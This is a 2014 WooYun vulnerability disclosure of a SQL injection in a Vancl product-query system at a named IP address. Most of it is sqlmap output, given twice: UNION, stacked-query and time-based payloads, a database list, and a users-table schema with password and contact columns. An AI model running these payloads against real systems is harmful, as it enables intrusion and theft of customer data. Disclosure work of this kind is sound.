当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062582

漏洞标题:蝴蝶效应,凡客诚品某重要系统未授权访问,后台注入

相关厂商:凡客诚品

漏洞作者: if、so

提交时间:2014-05-28 09:02

修复时间:2014-06-02 09:02

公开时间:2014-06-02 09:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蝴蝶效应,凡客诚品某重要系统未授权访问,后台注入

详细说明:

http://119.253.53.23/

1111.png


如图,是凡客诚品 天猫商城查询系统,后来看下,发现注入点
http://119.253.53.23/Shelf/Clothes?productCode=

Place: GET
Parameter: productCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: productCode='); WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: productCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: productCode='); WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
available databases [10]:
[*] Customer
[*] master
[*] model
[*] msdb
[*] SCM
[*] seckill
[*] tempdb
[*] UnionWebClick
[*] Vancl_Advertise
[*] VANCL_UNION


Database: SCM
Table: dbo.users
[48 columns]
+-----------------------+----------+
| Column                | Type     |
+-----------------------+----------+
| Address               | nvarchar |
| Answer                | nvarchar |
| Area                  | nvarchar |
| BlackLevel            | int      |
| BlackReason           | nvarchar |
| City                  | nvarchar |
| CountryID             | char     |
| EduLevel              | nvarchar |
| Email                 | nvarchar |
| FirstShopping         | datetime |
| IsAgency              | smallint |
| IsBlacklist           | bit      |
| IsLock                | bit      |
| IsOld                 | bit      |
| IsReturnBlack         | bit      |
| IsValidateEmail       | bit      |
| IsValidateMobile      | bit      |
| LastIP                | nvarchar |
| LastLogin             | datetime |
| LevelID               | int      |
| Mobile                | nvarchar |
| NewID                 | int      |
| NewUserName           | nvarchar |
| PayPassword           | char     |
| Phone                 | nvarchar |
| Postalcode            | nchar    |
| Province              | nvarchar |
| Question              | nvarchar |
| RegStatus             | int      |
| RegTime               | datetime |
| ReturnBlackReason     | nvarchar |
| SetBlackDateTime      | datetime |
| SetBlackReason        | int      |
| Sex                   | int      |
| ShowName              | nvarchar |
| SiteType              | int      |
| Source                | tinyint  |
| SourceID              | varchar  |
| TrueName              | nvarchar |
| uniqueNickName        | nvarchar |
| UserID                | int      |
| UserName              | nvarchar |
| UserPwd               | nvarchar |
| UserType              | int      |
| Vocation              | nvarchar |
| WebSourceID           | int      |
| WebSourceSon_UserName | nvarchar |
| WebSourceUserName     | nvarchar |
+-----------------------+----------+


随便翻了翻,感觉里面有料啊,就不继续跑了,大晚上的

漏洞证明:

Place: GET
Parameter: productCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: productCode='); WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: productCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: productCode='); WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
available databases [10]:
[*] Customer
[*] master
[*] model
[*] msdb
[*] SCM
[*] seckill
[*] tempdb
[*] UnionWebClick
[*] Vancl_Advertise
[*] VANCL_UNION


Database: SCM
Table: dbo.users
[48 columns]
+-----------------------+----------+
| Column                | Type     |
+-----------------------+----------+
| Address               | nvarchar |
| Answer                | nvarchar |
| Area                  | nvarchar |
| BlackLevel            | int      |
| BlackReason           | nvarchar |
| City                  | nvarchar |
| CountryID             | char     |
| EduLevel              | nvarchar |
| Email                 | nvarchar |
| FirstShopping         | datetime |
| IsAgency              | smallint |
| IsBlacklist           | bit      |
| IsLock                | bit      |
| IsOld                 | bit      |
| IsReturnBlack         | bit      |
| IsValidateEmail       | bit      |
| IsValidateMobile      | bit      |
| LastIP                | nvarchar |
| LastLogin             | datetime |
| LevelID               | int      |
| Mobile                | nvarchar |
| NewID                 | int      |
| NewUserName           | nvarchar |
| PayPassword           | char     |
| Phone                 | nvarchar |
| Postalcode            | nchar    |
| Province              | nvarchar |
| Question              | nvarchar |
| RegStatus             | int      |
| RegTime               | datetime |
| ReturnBlackReason     | nvarchar |
| SetBlackDateTime      | datetime |
| SetBlackReason        | int      |
| Sex                   | int      |
| ShowName              | nvarchar |
| SiteType              | int      |
| Source                | tinyint  |
| SourceID              | varchar  |
| TrueName              | nvarchar |
| uniqueNickName        | nvarchar |
| UserID                | int      |
| UserName              | nvarchar |
| UserPwd               | nvarchar |
| UserType              | int      |
| Vocation              | nvarchar |
| WebSourceID           | int      |
| WebSourceSon_UserName | nvarchar |
| WebSourceUserName     | nvarchar |
+-----------------------+----------+

修复方案:

来个20rank吧

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-02 09:02

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-28 09:15 | secgov ( 路人 | Rank:10 漏洞数:3 | 安全审计,漏洞挖掘,WAF. 揭露漏洞有风险,...)

    立即修复

  2. 2014-06-02 09:45 | zer0. ( 路人 | Rank:14 漏洞数:6 | 大家好 我是zer0——零点)

    已经忽略

  3. 2014-06-03 07:11 | wangbing86 ( 路人 | Rank:2 漏洞数:1 | 慢慢学习路)

    什么情况